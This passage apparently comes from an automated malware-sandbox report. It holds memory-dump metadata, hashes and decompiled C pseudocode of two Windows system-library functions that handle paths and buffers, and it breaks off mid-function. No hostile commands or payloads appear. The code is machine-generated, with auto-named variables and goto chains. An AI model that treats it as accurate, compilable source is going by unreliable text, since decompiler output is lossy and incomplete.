                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8917559a6ea65d252648d2eefb9553848ff4534d7f028be3bff78b547d464cbb
                                                                                                                                • Instruction ID: 85917e2076c08a012978845b60ee2b2907438c93d4a6bd6339345b0051ea6ce5
                                                                                                                                • Opcode Fuzzy Hash: 8917559a6ea65d252648d2eefb9553848ff4534d7f028be3bff78b547d464cbb
                                                                                                                                • Instruction Fuzzy Hash: F4423D75D002299FEB24CF69C880BA9B7B1FF45304F1481AAD88DEB341D775A986CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F04120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 92%
                                                                                                                                			E04F04120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4fdd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04F1F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04F06E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04F04620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04F06E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04F045F8))) {
												case 0:
													_v568 = 0x4ec1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4ec11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04F04620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04F2F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04F2F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04EE52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04EFEB70(1, 0x4fd79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04EFAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04F295D0();
																			L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04F2B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04F23D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04F2B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                0x04f04128
                                                                                                                                0x04f04135
                                                                                                                                0x04f0413c
                                                                                                                                0x04f04141
                                                                                                                                0x04f04145
                                                                                                                                0x04f04147
                                                                                                                                0x04f0414e
                                                                                                                                0x04f04151
                                                                                                                                0x04f04159
                                                                                                                                0x04f0415c
                                                                                                                                0x04f04160
                                                                                                                                0x04f04164
                                                                                                                                0x04f04168
                                                                                                                                0x04f0416c
                                                                                                                                0x04f0417f
                                                                                                                                0x04f04181
                                                                                                                                0x04f0446a
                                                                                                                                0x04f0446a
                                                                                                                                0x04f0418c
                                                                                                                                0x04f04195
                                                                                                                                0x04f04199
                                                                                                                                0x04f04432
                                                                                                                                0x04f04439
                                                                                                                                0x04f0443d
                                                                                                                                0x04f04442
                                                                                                                                0x04f04447
                                                                                                                                0x00000000
                                                                                                                                0x04f0419f
                                                                                                                                0x04f041a3
                                                                                                                                0x04f041b1
                                                                                                                                0x04f041b9
                                                                                                                                0x04f041bd
                                                                                                                                0x04f045db
                                                                                                                                0x04f045db
                                                                                                                                0x00000000
                                                                                                                                0x04f041c3
                                                                                                                                0x04f041c3
                                                                                                                                0x04f041ce
                                                                                                                                0x04f041d4
                                                                                                                                0x04f4e138
                                                                                                                                0x04f4e13e
                                                                                                                                0x04f4e169
                                                                                                                                0x04f4e16d
                                                                                                                                0x04f4e19e
                                                                                                                                0x04f4e16f
                                                                                                                                0x04f4e16f
                                                                                                                                0x04f4e175
                                                                                                                                0x04f4e179
                                                                                                                                0x04f4e18f
                                                                                                                                0x04f4e193
                                                                                                                                0x00000000
                                                                                                                                0x04f4e199
                                                                                                                                0x00000000
                                                                                                                                0x04f4e199
                                                                                                                                0x04f4e193
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f041da
                                                                                                                                0x04f041da
                                                                                                                                0x04f041df
                                                                                                                                0x04f041e4
                                                                                                                                0x04f041ec
                                                                                                                                0x04f04203
                                                                                                                                0x04f04207
                                                                                                                                0x04f4e1fd
                                                                                                                                0x04f04222
                                                                                                                                0x04f04226
                                                                                                                                0x04f4e1f3
                                                                                                                                0x04f4e1f3
                                                                                                                                0x04f0422c
                                                                                                                                0x04f0422c
                                                                                                                                0x04f04233
                                                                                                                                0x04f4e1ed
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f04239
                                                                                                                                0x04f04239
                                                                                                                                0x04f04239
                                                                                                                                0x04f04239
                                                                                                                                0x04f04233
                                                                                                                                0x04f04226
                                                                                                                                0x04f041ee
                                                                                                                                0x04f041ee
                                                                                                                                0x04f041f4
                                                                                                                                0x04f04575
                                                                                                                                0x04f4e1b1
                                                                                                                                0x04f4e1b1
                                                                                                                                0x00000000
                                                                                                                                0x04f0457b
                                                                                                                                0x04f0457b
                                                                                                                                0x04f04582
                                                                                                                                0x04f4e1ab
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f04588
                                                                                                                                0x04f04588
                                                                                                                                0x04f0458c
                                                                                                                                0x04f4e1c4
                                                                                                                                0x04f4e1c4
                                                                                                                                0x00000000
                                                                                                                                0x04f04592
                                                                                                                                0x04f04592
                                                                                                                                0x04f04599
                                                                                                                                0x04f4e1be
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0459f
                                                                                                                                0x04f0459f
                                                                                                                                0x04f045a3
                                                                                                                                0x04f4e1d7
                                                                                                                                0x04f4e1e4
                                                                                                                                0x00000000
                                                                                                                                0x04f045a9
                                                                                                                                0x04f045a9
                                                                                                                                0x04f045b0
                                                                                                                                0x04f4e1d1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f045b6
                                                                                                                                0x04f045b6
                                                                                                                                0x04f045b6
                                                                                                                                0x00000000
                                                                                                                                0x04f045b6
                                                                                                                                0x04f045b0
                                                                                                                                0x04f045a3
                                                                                                                                0x04f04599
                                                                                                                                0x04f0458c
                                                                                                                                0x04f04582
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f041f4
                                                                                                                                0x04f0423e
                                                                                                                                0x04f04241
                                                                                                                                0x04f045c0
                                                                                                                                0x04f045c4
                                                                                                                                0x00000000
                                                                                                                                0x04f045ca
                                                                                                                                0x04f045ca
                                                                                                                                0x00000000
                                                                                                                                0x04f4e207
                                                                                                                                0x04f4e20f
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f045d1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f045ca
                                                                                                                                0x00000000
                                                                                                                                0x04f04247
                                                                                                                                0x04f04247
                                                                                                                                0x04f04247
                                                                                                                                0x04f04249
                                                                                                                                0x04f04249
                                                                                                                                0x04f04249
                                                                                                                                0x04f04251
                                                                                                                                0x04f04251
                                                                                                                                0x04f04257
                                                                                                                                0x04f0425f
                                                                                                                                0x04f0426e
                                                                                                                                0x04f04270
                                                                                                                                0x04f0427a
                                                                                                                                0x04f4e219
                                                                                                                                0x04f4e219
                                                                                                                                0x04f04280
                                                                                                                                0x04f04282
                                                                                                                                0x04f04456
                                                                                                                                0x04f045ea
                                                                                                                                0x00000000
                                                                                                                                0x04f045f0
                                                                                                                                0x04f4e223
                                                                                                                                0x00000000
                                                                                                                                0x04f4e223
                                                                                                                                0x04f0445c
                                                                                                                                0x04f0445c
                                                                                                                                0x00000000
                                                                                                                                0x04f0445c
                                                                                                                                0x00000000
                                                                                                                                0x04f04288
                                                                                                                                0x04f0428c
                                                                                                                                0x04f4e298
                                                                                                                                0x04f04292
                                                                                                                                0x04f04292
                                                                                                                                0x04f0429e
                                                                                                                                0x04f042a3
                                                                                                                                0x04f042a7
                                                                                                                                0x04f042ac
                                                                                                                                0x04f4e22d
                                                                                                                                0x04f042b2
                                                                                                                                0x04f042b2
                                                                                                                                0x04f042b9
                                                                                                                                0x04f042bc
                                                                                                                                0x04f042c2
                                                                                                                                0x04f042ca
                                                                                                                                0x04f042cd
                                                                                                                                0x04f042cd
                                                                                                                                0x04f042d4
                                                                                                                                0x04f0433f
                                                                                                                                0x04f0433f
                                                                                                                                0x04f042d6
                                                                                                                                0x04f042d6
                                                                                                                                0x04f042d9
                                                                                                                                0x04f042dd
                                                                                                                                0x04f042eb
                                                                                                                                0x04f4e23a
                                                                                                                                0x04f042f1
                                                                                                                                0x04f04305
                                                                                                                                0x04f0430d
                                                                                                                                0x04f04315
                                                                                                                                0x04f04318
                                                                                                                                0x04f0431f
                                                                                                                                0x04f04322
                                                                                                                                0x04f0432e
                                                                                                                                0x04f0433b
                                                                                                                                0x04f0433b
                                                                                                                                0x00000000
                                                                                                                                0x04f0432e
                                                                                                                                0x04f042eb
                                                                                                                                0x04f0434c
                                                                                                                                0x04f0434e
                                                                                                                                0x04f04352
                                                                                                                                0x04f04359
                                                                                                                                0x04f0435e
                                                                                                                                0x04f04361
                                                                                                                                0x04f0436e
                                                                                                                                0x04f0438a
                                                                                                                                0x04f0438e
                                                                                                                                0x04f04396
                                                                                                                                0x04f0439e
                                                                                                                                0x04f043a1
                                                                                                                                0x04f043ad
                                                                                                                                0x04f043bb
                                                                                                                                0x04f043bb
                                                                                                                                0x04f043ad
                                                                                                                                0x04f0436e
                                                                                                                                0x04f043bf
                                                                                                                                0x04f043c5
                                                                                                                                0x04f04463
                                                                                                                                0x04f04463
                                                                                                                                0x04f043ce
                                                                                                                                0x04f043d5
                                                                                                                                0x04f043d9
                                                                                                                                0x04f043df
                                                                                                                                0x04f04475
                                                                                                                                0x04f04479
                                                                                                                                0x04f04491
                                                                                                                                0x04f04491
                                                                                                                                0x04f04479
                                                                                                                                0x04f043e5
                                                                                                                                0x04f043eb
                                                                                                                                0x04f043f4
                                                                                                                                0x04f043f6
                                                                                                                                0x04f043f9
                                                                                                                                0x04f043fc
                                                                                                                                0x04f043ff
                                                                                                                                0x04f044e8
                                                                                                                                0x04f044ed
                                                                                                                                0x04f044f3
                                                                                                                                0x04f4e247
                                                                                                                                0x00000000
                                                                                                                                0x04f044f9
                                                                                                                                0x04f04504
                                                                                                                                0x04f04508
                                                                                                                                0x04f0450f
                                                                                                                                0x04f4e269
                                                                                                                                0x00000000
                                                                                                                                0x04f04515
                                                                                                                                0x04f04519
                                                                                                                                0x04f04531
                                                                                                                                0x04f04534
                                                                                                                                0x04f04537
                                                                                                                                0x04f0453e
                                                                                                                                0x04f04541
                                                                                                                                0x04f0454a
                                                                                                                                0x04f4e255
                                                                                                                                0x04f4e255
                                                                                                                                0x04f4e25b
                                                                                                                                0x04f4e25e
                                                                                                                                0x04f4e261
                                                                                                                                0x04f4e261
                                                                                                                                0x04f04555
                                                                                                                                0x04f04559
                                                                                                                                0x04f0455d
                                                                                                                                0x04f4e26d
                                                                                                                                0x04f4e270
                                                                                                                                0x04f4e274
                                                                                                                                0x04f4e27a
                                                                                                                                0x04f4e27d
                                                                                                                                0x04f4e28e
                                                                                                                                0x04f4e28e
                                                                                                                                0x04f04563
                                                                                                                                0x04f04563
                                                                                                                                0x04f04569
                                                                                                                                0x04f04569
                                                                                                                                0x00000000
                                                                                                                                0x04f0455d
                                                                                                                                0x04f0450f
                                                                                                                                0x00000000
                                                                                                                                0x04f044f3
                                                                                                                                0x04f043ff
                                                                                                                                0x04f04405
                                                                                                                                0x04f04405
                                                                                                                                0x04f04405
                                                                                                                                0x04f042ac
                                                                                                                                0x04f0428c
                                                                                                                                0x04f04282
                                                                                                                                0x04f04407
                                                                                                                                0x04f0440d
                                                                                                                                0x04f4e2af
                                                                                                                                0x04f4e2af
                                                                                                                                0x04f04413
                                                                                                                                0x04f04413
                                                                                                                                0x00000000
                                                                                                                                0x04f041d4
                                                                                                                                0x00000000
                                                                                                                                0x04f041c3
                                                                                                                                0x04f041bd
                                                                                                                                0x04f04415
                                                                                                                                0x04f04415
                                                                                                                                0x04f04416
                                                                                                                                0x04f04417
                                                                                                                                0x04f04429
                                                                                                                                0x04f0416e
                                                                                                                                0x04f0416e
                                                                                                                                0x04f04175
                                                                                                                                0x04f04498
                                                                                                                                0x04f0449f
                                                                                                                                0x04f4e12d
                                                                                                                                0x00000000
                                                                                                                                0x04f4e133
                                                                                                                                0x00000000
                                                                                                                                0x04f4e133
                                                                                                                                0x04f044a5
                                                                                                                                0x04f044a5
                                                                                                                                0x04f044aa
                                                                                                                                0x00000000
                                                                                                                                0x04f044bb
                                                                                                                                0x04f044ca
                                                                                                                                0x04f044d6
                                                                                                                                0x04f044d7
                                                                                                                                0x04f044d8
                                                                                                                                0x04f044e3
                                                                                                                                0x04f044e3
                                                                                                                                0x04f044aa
                                                                                                                                0x04f0417b
                                                                                                                                0x04f0417b
                                                                                                                                0x04f0417b
                                                                                                                                0x00000000
                                                                                                                                0x04f0417b
                                                                                                                                0x04f04175
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9bb40fbe3bb0410d26a7ffd3a9867c39d173cbb12d8b3d64b2a7ccd0966a184f
                                                                                                                                • Instruction ID: d573fb21f58ab3081f317aa9b26a924e2d2bac6e1d688bc4615d37bbc0764e40
                                                                                                                                • Opcode Fuzzy Hash: 9bb40fbe3bb0410d26a7ffd3a9867c39d173cbb12d8b3d64b2a7ccd0966a184f
                                                                                                                                • Instruction Fuzzy Hash: 6CF17175A082118FD724CF19C480A3AB7E1FFC8708F55896EF985C7290E734E942EB52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F120A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 92%
                                                                                                                                			E04F120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4fd8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04F12EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04F12EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04EE58EC(_t240);
									_t221 =  *0x4fd5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4fd5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04F24A2C(0x4fd6e40, 0x4f24b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
